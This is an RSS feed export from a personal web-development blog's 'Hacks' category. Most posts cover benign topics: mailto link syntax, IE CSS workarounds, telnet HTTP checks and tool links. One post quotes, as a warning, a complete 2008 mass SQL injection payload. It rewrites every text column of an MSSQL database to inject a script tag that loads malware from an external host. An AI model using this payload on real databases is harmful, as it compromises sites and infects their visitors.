<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>ourlil.com &#187; Hacks</title>
	<atom:link href="http://OurLil.com/blog/category/hacks/feed/" rel="self" type="application/rss+xml" />
	<link>http://OurLil.com</link>
	<description>A web site for tutti noi (all of us!)</description>
	<lastBuildDate>Mon, 28 Nov 2011 15:23:22 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0.1</generator>
		<item>
		<title>MailTo Syntax</title>
		<link>http://OurLil.com/blog/mailto-syntax/683/</link>
		<comments>http://OurLil.com/blog/mailto-syntax/683/#comments</comments>
		<pubDate>Mon, 26 Jul 2010 20:49:18 +0000</pubDate>
		<dc:creator>webmaestro</dc:creator>
				<category><![CDATA[HTML]]></category>
		<category><![CDATA[Hacks]]></category>
		<category><![CDATA[coding]]></category>
		<category><![CDATA[cool]]></category>
		<category><![CDATA[mail]]></category>
		<category><![CDATA[nifty]]></category>

		<guid isPermaLink="false">http://OurLil.com/?p=683</guid>
		<description><![CDATA[MailTo Syntax. The MailTo command can do more than enter a single e-mail address in the &#8220;Send To&#8221; field while activating your e-mail program. It can also: Feature Syntax Address message to multiple recipients , (comma separating e-mail addresses) Add entry in the &#8220;Subject&#8221; field subject=Subject Field Text Add entry in the &#8220;Copy To&#8221; or [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.ianr.unl.edu/internet/mailto.html">MailTo Syntax</a>.</p>
<p>The MailTo command can do more than enter a single e-mail address in the &#8220;Send To&#8221; field while activating your e-mail program. It can also:</p>
<table>
<tbody>
<tr>
<td><strong>Feature</strong></td>
<td></td>
<td><strong>Syntax</strong></td>
</tr>
<tr>
<td>Address message to multiple recipients</td>
<td></td>
<td>,   (comma  separating e-mail addresses)</td>
</tr>
<tr>
<td>Add entry in the &#8220;Subject&#8221; field</td>
<td></td>
<td>subject=Subject Field Text</td>
</tr>
<tr>
<td>Add entry in the &#8220;Copy To&#8221; or &#8220;CC&#8221; field</td>
<td></td>
<td>cc=id@internet.node</td>
</tr>
<tr>
<td>Add entry in the &#8220;Blind Copy To&#8221; or &#8220;BCC&#8221; field</td>
<td></td>
<td>bcc=id@internet.node</td>
</tr>
<tr>
<td valign="top">Add entry in the &#8220;Body&#8221; field</td>
<td></td>
<td>body=Your message here<br />
Within the body use &#8220;%0A&#8221; for a new line,<br />
use &#8220;%0A%0A&#8221; for a new line preceded by a blank line (paragraph),<br />
see example below.</td>
</tr>
</tbody>
</table>
<p><strong>Notes:</strong></p>
<p><strong>&#8221; &#8220;</strong> (beginning and ending double quotes) are necessary if any spaces are used Mailto parameter should be preceded by &#8220;?&#8221; for the first or only parameter  and &#8220;&amp;&#8221; for second and subsequent parameter.</p>
<p>Some examples, with actual HTML Code included, follow:</p>
<p><a href="mailto:astark1@unl.edu"><strong>Simple MailTo</strong></a></p>
<ul>
<li>&lt;a href=&#8221;mailto:astark1@unl.edu&#8221;&gt;<a href="mailto:astark1@unl.edu,ASTARK1@UNL.EDU"><strong>MailTo with Multiple Recipients</strong></a>
</li>
<li>&lt;a href=&#8221;mailto:astark1@unl.edu<strong>,ASTARK1@UNL.EDU</strong>&#8220;&gt;<a href="mailto:astark1@unl.edu?subject=Comments%20from%20MailTo%20Syntax%20Page"><strong>MailTo with Subject</strong></a></li>
<li>&lt;a href=&#8221;mailto:astark1@unl.edu<strong>?subject=Comments from MailTo Syntax Page</strong>&#8220;&gt;
<p><a href="mailto:astark1@unl.edu?cc=ASTARK1@UNL.EDU"><strong>MailTo with a Copy</strong></a></li>
<li>&lt;a href=&#8221;mailto:astark1@unl.edu<strong>?cc=ASTARK1@UNL.EDU</strong>&#8220;&gt;<a href="mailto:astark1@unl.edu?bcc=ASTARK1@UNL.EDU"><strong>MailTo with a Blind Copy</strong></a>
</li>
<li>&lt;a href=&#8221;mailto:astark1@unl.edu<strong>?bcc=ASTARK1@UNL.EDU</strong>&#8220;&gt;<a href="mailto:astark1@unl.edu?body=I%20am%20having%20trouble%20finding%20information%20on%20"><strong>MailTo with message already started in Body</strong></a>
</li>
<li>&lt;a href=&#8221;mailto:astark1@unl.edu<strong>?body=I am having trouble finding information on </strong>&#8220;&gt;<a href="mailto:astark1@unl.edu?body=The%20message%27s%20first%20paragraph.%0A%0aSecond%20paragraph.%0A%0AThird%20Paragraph.%20"><strong>MailTo with multiline message in Body</strong></a></li>
<li>&lt;a href=&#8221;mailto:astark1@unl.edu<strong>?body=The message&#8217;s first paragraph.%0A%0aSecond paragraph.%0A%0AThird Paragraph.</strong>&#8220;&gt;<strong>NOTE:</strong> Use &#8220;%0A&#8221; for a new line, use &#8220;%0A%0A&#8221; for a new line preceded by a blank line.</li>
</ul>
<h2>Features may be used in combination</h2>
<ul>
<li><a href="mailto:astark1@unl.edu?subject=MailTo%20Comments&amp;cc=ASTARK1@UNL.EDU&amp;bcc=id@internet.node"> <strong>MailTo with Subject, a Recipient, a Copy and a Blind Copy</strong></a></li>
<li>
&lt;a href=&#8221;mailto:astark1@unl.edu?subject=MailTo Comments&amp;cc=ASTARK1@UNL.EDU&amp;bcc=id@internet.node&#8221;&gt;
</li>
</ul>
<p>Remember to use only one ? (question mark), when providing multiple entries beyond e-mail address</p>
]]></content:encoded>
			<wfw:commentRss>http://OurLil.com/blog/mailto-syntax/683/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>IEBlog : Site Compatibility and IE8</title>
		<link>http://OurLil.com/blog/ieblog-site-compatibility-and-ie8/525/</link>
		<comments>http://OurLil.com/blog/ieblog-site-compatibility-and-ie8/525/#comments</comments>
		<pubDate>Fri, 20 Mar 2009 20:43:06 +0000</pubDate>
		<dc:creator>webmaestro</dc:creator>
				<category><![CDATA[Browsers]]></category>
		<category><![CDATA[Hacks]]></category>

		<guid isPermaLink="false">http://clay.blog.appeal-democrat.com/2009/03/20/ieblog-site-compatibility-and-ie8/525/</guid>
		<description><![CDATA[IEBlog : Site Compatibility and IE8 Here&#8217;re a couple of methods for coding to IE8 (new hacks! d&#8217;oh!): Initial CSS Property Values Unset properties on the currentStyle object now return their initial value. Relying on the old initial values for CSS properties such as z-index can cause problems. This is the root cause of issues [...]]]></description>
			<content:encoded><![CDATA[<p><img class="aligncenter" src="http://ieblog.members.winisp.net/images/IE8_logo.jpg" alt="" /></p>
<p><a href="http://blogs.msdn.com/ie/archive/2009/03/12/site-compatibility-and-ie8.aspx">IEBlog : Site Compatibility and IE8</a></p>
<p>Here&#8217;re a couple of methods for coding to IE8 (new hacks! d&#8217;oh!):</p>
<p><strong>Initial CSS Property Values</strong></p>
<table style="width: 100%" border="0" cellspacing="10" cellpadding="0" width="100%">
<tbody>
<tr>
<td style="padding: 0in 5.75pt;width: 49.06%" width="49%" valign="top">Unset properties on the currentStyle object now return their initial value. Relying on the old initial values for CSS properties such as z-index can cause problems. <em><a href="http://blogs.msdn.com/giorgio/archive/2009/02/01/asp-net-menu-and-ie8-rendering-white-issue.aspx">This is the root cause of issues with the ASP.NET menu control</a>.</em></td>
<td style="padding: 0in 5.75pt;width: 49.08%" width="49%" valign="top">SOLUTION: Perform a check for both the backwards compatible value and the standardized initial value.</td>
</tr>
<tr>
<td style="padding: 0in 5.75pt;width: 49.06%" width="49%" valign="top"><span style="font-family: courier new">var zIndex = elm.currentStyle.zIndex;</span><br />
<span style="font-family: courier new">if(zIndex == 0) {</span><br />
<span style="font-family: courier new"><span> </span>// custom code</span><br />
<span style="font-family: courier new">}</span></td>
<td style="padding: 0in 5.75pt;width: 49.08%" width="49%" valign="top"><span style="font-family: courier new">var zIndex = elm.currentStyle.zIndex;</span><br />
<span style="font-family: courier new">if(zIndex == 0 <span>|| zIndex == &#8220;auto&#8221;</span>) {</span><br />
<span style="font-family: courier new"><span> </span>// custom code</span><br />
<span style="font-family: courier new">}</span></td>
</tr>
</tbody>
</table>
]]></content:encoded>
			<wfw:commentRss>http://OurLil.com/blog/ieblog-site-compatibility-and-ie8/525/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Tutorials &#8211; Servers &gt; Telnet as a Diagnostic Aid</title>
		<link>http://OurLil.com/blog/tutorials-servers-telnet-as-a-diagnostic-aid/495/</link>
		<comments>http://OurLil.com/blog/tutorials-servers-telnet-as-a-diagnostic-aid/495/#comments</comments>
		<pubDate>Mon, 16 Feb 2009 23:28:45 +0000</pubDate>
		<dc:creator>webmaestro</dc:creator>
				<category><![CDATA[Hacks]]></category>
		<category><![CDATA[Unix]]></category>
		<category><![CDATA[coding]]></category>
		<category><![CDATA[nifty]]></category>
		<category><![CDATA[tools]]></category>

		<guid isPermaLink="false">http://clay.freedomblogging.com/2009/02/16/tutorials-servers-telnet-as-a-diagnostic-aid/495/</guid>
		<description><![CDATA[I don&#8217;t know about you, but I can use a reefresher now and again for things like surfing with Telnet to determine if 301 re-directs work&#8230; In a nutshell, you&#8217;ll want something like this: telnet eastvalley.freedomblogging.com 80[cr] Trying 69.25.233.100&#8230; Connected to eastvalley.freedomblogging.com. Escape character is &#8216;^]&#8217;. HEAD / HTTP/1.1[cr] Host: eastvalley.freedomblogging.com[cr] [cr] Note: italic items [...]]]></description>
			<content:encoded><![CDATA[<p>I don&#8217;t know about you, but I can use a reefresher now and again for things like <a title="Using Telnet as a Diagnostic Aid" href="http://usertools.plus.net/tutorials/id/21">surfing with Telnet</a> to determine if 301 re-directs work&#8230;</p>
<p>In a nutshell, you&#8217;ll want something like this:</p>
<blockquote><p>telnet eastvalley.freedomblogging.com 80<em>[cr]</em><br />
<em>Trying 69.25.233.100&#8230;</em><br />
<em>Connected to eastvalley.freedomblogging.com.</em><br />
<em>Escape character is &#8216;^]&#8217;.</em><br />
HEAD / HTTP/1.1<em>[cr]</em><br />
Host: eastvalley.freedomblogging.com<em>[cr]</em><br />
<em>[cr]</em><br />
<em></em></p></blockquote>
<p><strong>Note:</strong> <em>italic</em> items are sent by the server, whilst non-italic items are typed. Also NOTE the double carriage return (<em>[cr]</em>) at the end.</p>
<p><a href="http://usertools.plus.net/tutorials/id/21">Tutorials &#8211; Servers &gt; Telnet as a Diagnostic Aid</a></p>
]]></content:encoded>
			<wfw:commentRss>http://OurLil.com/blog/tutorials-servers-telnet-as-a-diagnostic-aid/495/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Hacking IE CSS: Underscore, Box Model &#8216;Voice Family&#8217;, &amp; Star hacks</title>
		<link>http://OurLil.com/blog/hacking-ie-css-underscore-box-model-voice-family-star-hacks/318/</link>
		<comments>http://OurLil.com/blog/hacking-ie-css-underscore-box-model-voice-family-star-hacks/318/#comments</comments>
		<pubDate>Thu, 18 Dec 2008 16:43:26 +0000</pubDate>
		<dc:creator>webmaestro</dc:creator>
				<category><![CDATA[Hacks]]></category>
		<category><![CDATA[coding]]></category>

		<guid isPermaLink="false">http://clay.freedomblogging.com/2008/12/18/hacking-ie-css-underscore-box-model-voice-family-star-hacks/318/</guid>
		<description><![CDATA[CSS Hacks Underscore Hack /* CSS hack for IE 6 and below */ .test { position: fixed; _position: absolute; } Voice Family (Box Family or Tantek Hack) /* CSS hack for IE 5.x */ .test { width: 500px; padding: 50px; voice-family: "\"}\""; voice-family: inherit; width: 400px; } html&#62;body .test{ width: 400px; } Backslash Hack /* [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://reference.sitepoint.com/css/hacks">CSS Hacks</a></p>
<p><strong>Underscore Hack</strong></p>
<pre><code>/* CSS hack for IE 6 and below */</code>
<code>.test {
  position: fixed;
  _position: absolute;
}</code></pre>
<p><strong>Voice Family (Box Family or Tantek Hack)</strong></p>
<pre><code>/* CSS hack for IE 5.x */</code><code>
.test {
  width: 500px;
  padding: 50px;
  voice-family: "\"}\"";
  voice-family: inherit;
  width: 400px;
}
html&gt;body .test{
 width: 400px;
}</code></pre>
<p><strong>Backslash Hack</strong></p>
<pre><code>/* CSS hack for IE 5.5 and below */</code><code>
</code>
<code>.test {
  height: 500px;
  he\ight: 400px;
}</code></pre>
<pre></pre>
<p><strong>Commented Backslash Hack</strong></p>
<pre><code>/* begin hiding from IE5 Mac \*/
.test {
  color: red;
}
/* end */
</code></pre>
<p>And then there&#8217;s:</p>
<pre><code>/* apply ONLY to IE5 Mac \*//*/
.test {
  color: red;
}
/* end */</code></pre>
<p><strong>High Pass Filter</strong></p>
<pre><code>/* CSS hack hides from browser which don't support @import */</code><code>
</code><code>  @import "null.css?\"\{";
  @import "highpass.css";
</code></pre>
<p><strong><br />
</strong></p>
<pre></pre>
]]></content:encoded>
			<wfw:commentRss>http://OurLil.com/blog/hacking-ie-css-underscore-box-model-voice-family-star-hacks/318/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Farbtastic: jQuery color picker plug-in &#124; Steven Wittens &#8211; Acko.net</title>
		<link>http://OurLil.com/blog/farbtastic-jquery-color-picker-plug-in-steven-wittens-ackonet/189/</link>
		<comments>http://OurLil.com/blog/farbtastic-jquery-color-picker-plug-in-steven-wittens-ackonet/189/#comments</comments>
		<pubDate>Fri, 05 Sep 2008 15:32:47 +0000</pubDate>
		<dc:creator>webmaestro</dc:creator>
				<category><![CDATA[HTML]]></category>
		<category><![CDATA[Hacks]]></category>
		<category><![CDATA[Interactive Team]]></category>
		<category><![CDATA[Web 2.0]]></category>
		<category><![CDATA[WebTech]]></category>
		<category><![CDATA[coding]]></category>
		<category><![CDATA[javascript]]></category>
		<category><![CDATA[nifty]]></category>
		<category><![CDATA[tools]]></category>
		<category><![CDATA[color]]></category>
		<category><![CDATA[js]]></category>
		<category><![CDATA[picker]]></category>

		<guid isPermaLink="false">http://clay.freedomblogging.com/2008/09/05/farbtastic-jquery-color-picker-plug-in-steven-wittens-ackonet/</guid>
		<description><![CDATA[Farbtastic is a jQuery plug-in that can add one or more color picker widgets into a page through JavaScript. Each widget is then linked to an existing element (e.g. a text field) and will update the element&#8217;s value when a color is selected. Download Farbtastic 1.2 &#8211; 8 January 2007 (License: GPL). Farbtastic: jQuery color [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://clay.freedomblogging.com/?attachment_id=190"><img src="http://OurLil.com/files/farbtastic_screenshot.jpg" alt="Farbtastic Color Picker widget" align="right" border="0" hspace="10" vspace="10" width="125" /></a>Farbtastic is a <a href="http://www.jquery.com/">jQuery</a> plug-in that can add one or more color picker widgets into a page through JavaScript. Each widget is then linked to an existing element (e.g. a text field) and will update the element&#8217;s value when a color is selected.</p>
<p><a href="http://acko.net/files/farbtastic_/farbtastic12.zip">Download Farbtastic 1.2</a> &#8211; 8 January 2007 (License: <a href="http://www.gnu.org/copyleft/gpl.html">GPL</a>).</p>
<p><a href="http://acko.net/dev/farbtastic">Farbtastic: jQuery color picker plug-in | Steven Wittens &#8211; Acko.net</a></p>
]]></content:encoded>
			<wfw:commentRss>http://OurLil.com/blog/farbtastic-jquery-color-picker-plug-in-steven-wittens-ackonet/189/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Javascript Format and Colour</title>
		<link>http://OurLil.com/blog/javascript-format-and-colour/188/</link>
		<comments>http://OurLil.com/blog/javascript-format-and-colour/188/#comments</comments>
		<pubDate>Thu, 04 Sep 2008 15:58:15 +0000</pubDate>
		<dc:creator>webmaestro</dc:creator>
				<category><![CDATA[Hacks]]></category>
		<category><![CDATA[Interactive Team]]></category>
		<category><![CDATA[coding]]></category>
		<category><![CDATA[javascript]]></category>
		<category><![CDATA[tools]]></category>
		<category><![CDATA[js]]></category>

		<guid isPermaLink="false">http://clay.freedomblogging.com/2008/09/04/javascript-format-and-colour/</guid>
		<description><![CDATA[Javascript Format and Colour This is a nifty tool to format JavaScript that has been mini-fied. Very nifty for reading JavaScript (although it doesn&#8217;t get your function names back, if they&#8217;ve been obfuscated&#8230;).]]></description>
			<content:encoded><![CDATA[<p><a href="http://javascript.about.com/library/blformat.htm">Javascript Format and Colour</a></p>
<p>This is a nifty tool to format JavaScript that has been mini-fied. Very nifty for reading JavaScript (although it doesn&#8217;t get your function names back, if they&#8217;ve been obfuscated&#8230;).</p>
]]></content:encoded>
			<wfw:commentRss>http://OurLil.com/blog/javascript-format-and-colour/188/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>TrustedSource &#8211; Blog &#8211; New SQL Injection Attack Infecting Machines</title>
		<link>http://OurLil.com/blog/trustedsource-blog-new-sql-injection-attack-infecting-machines/182/</link>
		<comments>http://OurLil.com/blog/trustedsource-blog-new-sql-injection-attack-infecting-machines/182/#comments</comments>
		<pubDate>Tue, 12 Aug 2008 20:32:31 +0000</pubDate>
		<dc:creator>webmaestro</dc:creator>
				<category><![CDATA[Hacks]]></category>
		<category><![CDATA[News]]></category>
		<category><![CDATA[Windoze]]></category>
		<category><![CDATA[database]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[whoa!]]></category>
		<category><![CDATA[hack]]></category>

		<guid isPermaLink="false">http://clay.freedomblogging.com/2008/08/12/trustedsource-blog-new-sql-injection-attack-infecting-machines/</guid>
		<description><![CDATA[Here&#8217;s a sample of the type of SQL Injection MSSQL (and possibly Sybase) databases may be subjected to: DECLARE @T varchar(255), @C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name, b.name from sysobjects a, syscolumns b where a.id=b.id and a.xtype=â€™uâ€™ and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C [...]]]></description>
			<content:encoded><![CDATA[<p>Here&#8217;s a sample of the type of SQL Injection MSSQL (and possibly Sybase) databases may be subjected to:<br />
<blockquote>DECLARE @T varchar(255), @C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name, b.name from sysobjects a, syscolumns b where a.id=b.id and a.xtype=â€™uâ€™ and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec(â€™update ['+@T+'] set ['+@C +']=['+@C+']+â€â€&gt;&lt;/title&gt;&lt;script src=â€http://www.domain.com/malware/ w.jsâ€&gt;&lt;/script&gt;&lt;!â€“â€ where â€˜+@C+â€™ not like â€%â€&gt;&lt;/title&gt;&lt;script src=â€http://www.domain.com/malware/w.js â€œ&gt;&lt;/script&gt;&lt;!â€“â€â€™)FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor</p></blockquote>
<p><code></code>Â <a href="http://www.trustedsource.org/blog/142/New-SQL-Injection-Attack-Infecting-Machines">TrustedSource &#8211; Blog &#8211; New SQL Injection Attack Infecting Machines</a></p>
]]></content:encoded>
			<wfw:commentRss>http://OurLil.com/blog/trustedsource-blog-new-sql-injection-attack-infecting-machines/182/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Workarounds, Filters, and Hacks â€“ SitePoint CSS Reference</title>
		<link>http://OurLil.com/blog/workarounds-filters-and-hacks-%e2%80%93-sitepoint-css-reference/176/</link>
		<comments>http://OurLil.com/blog/workarounds-filters-and-hacks-%e2%80%93-sitepoint-css-reference/176/#comments</comments>
		<pubDate>Fri, 08 Aug 2008 22:06:28 +0000</pubDate>
		<dc:creator>webmaestro</dc:creator>
				<category><![CDATA[Hacks]]></category>
		<category><![CDATA[workarounds]]></category>
		<category><![CDATA[CSS]]></category>

		<guid isPermaLink="false">http://clay.freedomblogging.com/2008/08/08/workarounds-filters-and-hacks-%e2%80%93-sitepoint-css-reference/</guid>
		<description><![CDATA[Here&#8217;s an interesting site for CSS hacks and workarounds&#8230; Workarounds, Filters, and Hacks â€“ SitePoint CSS Reference]]></description>
			<content:encoded><![CDATA[<p>Here&#8217;s an interesting site for CSS hacks and workarounds&#8230;</p>
<p><a href="http://reference.sitepoint.com/css/workaroundsfiltershacks">Workarounds, Filters, and Hacks â€“ SitePoint CSS Reference</a></p>
]]></content:encoded>
			<wfw:commentRss>http://OurLil.com/blog/workarounds-filters-and-hacks-%e2%80%93-sitepoint-css-reference/176/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How Snow Leopard can save Mac OS X from malware attacks &#124; Zero Day &#124; ZDNet.com</title>
		<link>http://OurLil.com/blog/how-snow-leopard-can-save-mac-os-x-from-malware-attacks-zero-day-zdnetcom/164/</link>
		<comments>http://OurLil.com/blog/how-snow-leopard-can-save-mac-os-x-from-malware-attacks-zero-day-zdnetcom/164/#comments</comments>
		<pubDate>Tue, 24 Jun 2008 23:56:21 +0000</pubDate>
		<dc:creator>webmaestro</dc:creator>
				<category><![CDATA[Hacks]]></category>
		<category><![CDATA[Mac]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[os x]]></category>

		<guid isPermaLink="false">http://clay.freedomblogging.com/2008/06/24/how-snow-leopard-can-save-mac-os-x-from-malware-attacks-zero-day-zdnetcom/</guid>
		<description><![CDATA[Here&#8217;s a nice discussion on how to improve Mac OS X Security. It contains some dreams about what Mac OS X 10.6 Snow Leopard will bring. How Snow Leopard can save Mac OS X from malware attacks &#124; Zero Day &#124; ZDNet.com]]></description>
			<content:encoded><![CDATA[<p>Here&#8217;s a nice discussion on how to improve Mac OS X Security. It contains some dreams about what Mac OS X 10.6 Snow Leopard will bring.</p>
<p><a href="http://blogs.zdnet.com/security/?p=1325">How Snow Leopard can save Mac OS X from malware attacks | Zero Day | ZDNet.com</a></p>
]]></content:encoded>
			<wfw:commentRss>http://OurLil.com/blog/how-snow-leopard-can-save-mac-os-x-from-malware-attacks-zero-day-zdnetcom/164/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>I, Cringely . The Pulpit . It&#8217;s the Platform, Stupid &#124; PBS</title>
		<link>http://OurLil.com/blog/i-cringely-the-pulpit-its-the-platform-stupid-pbs/161/</link>
		<comments>http://OurLil.com/blog/i-cringely-the-pulpit-its-the-platform-stupid-pbs/161/#comments</comments>
		<pubDate>Thu, 12 Jun 2008 19:05:56 +0000</pubDate>
		<dc:creator>webmaestro</dc:creator>
				<category><![CDATA[Hacks]]></category>
		<category><![CDATA[Trends]]></category>
		<category><![CDATA[nifty]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[whoa!]]></category>

		<guid isPermaLink="false">http://clay.freedomblogging.com/2008/06/12/i-cringely-the-pulpit-its-the-platform-stupid-pbs/</guid>
		<description><![CDATA[I, Cringely . The Pulpit . It&#8217;s the Platform, Stupid &#124; PBS Cars are the key to U.S. energy consumption. The dominant automotive platform here, whether you drive a truck, a car, or a motorcycle, relies on gasoline-fueled internal combustion engines. That&#8217;s the platform we are unlikely to change quickly. So how do we leave [...]]]></description>
			<content:encoded><![CDATA[<p><img src="http://www.pbs.org/cringely/images/headers/section_pulpit_home.gif" alt="Bob's Weekly Technification" height="58" width="223" /></p>
<p><a href="http://www.pbs.org/cringely/pulpit/2008/pulpit_20080606_005036.html">I, Cringely . The Pulpit . It&#8217;s the Platform, Stupid | PBS</a></p>
<blockquote><p><img src="http://www.pbs.org/cringely/images/bob_thumb.jpg" alt="Robert X. Cringely" align="right" border="0" height="94" hspace="10" vspace="10" width="81" /> Cars are the key to U.S. energy consumption. The dominant automotive platform here, whether you drive a truck, a car, or a motorcycle, relies on gasoline-fueled internal combustion engines. That&#8217;s the platform we are unlikely to change quickly. So how do we leave that platform intact and unchanged, ask nobody to significantly sacrifice, yet still achieve the noble (and Nobel) goals of lower fuel consumption, lower greenhouse gas emissions, lower pollution levels, dramatically lower oil consumption, lower cost, and lower geopolitical vulnerability for our country? There&#8217;s only one way I know to accomplish this: change the fuel.</p>
<p>This happened to a certain extent in Brazil during the &#8217;70s and &#8217;80s by embracing ethanol. But ethanol has less energy per gallon so fuel consumption goes up and mileage goes down. Ethanol can&#8217;t be shipped in pipelines also used for oil. Cars have to be modified to run on it and even then there are issues about internal corrosion. Ethanol is far from perfect. What&#8217;s needed is a replacement for gasoline that looks and feels and tastes just like gas to your car but isn&#8217;t made from oil. Then the platform could remain completely unchanged yet my 1966 Thunderbird (and the world) could benefit starting with the very next tankful.</p>
<p>There is such a fuel, developed by a husband and wife team of scientists working in Indiana in cooperation with Purdue University. This new fuel, called SwiftFuel, is right now intended for airplanes, not cars, but the lessons are the same.</p></blockquote>
]]></content:encoded>
			<wfw:commentRss>http://OurLil.com/blog/i-cringely-the-pulpit-its-the-platform-stupid-pbs/161/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

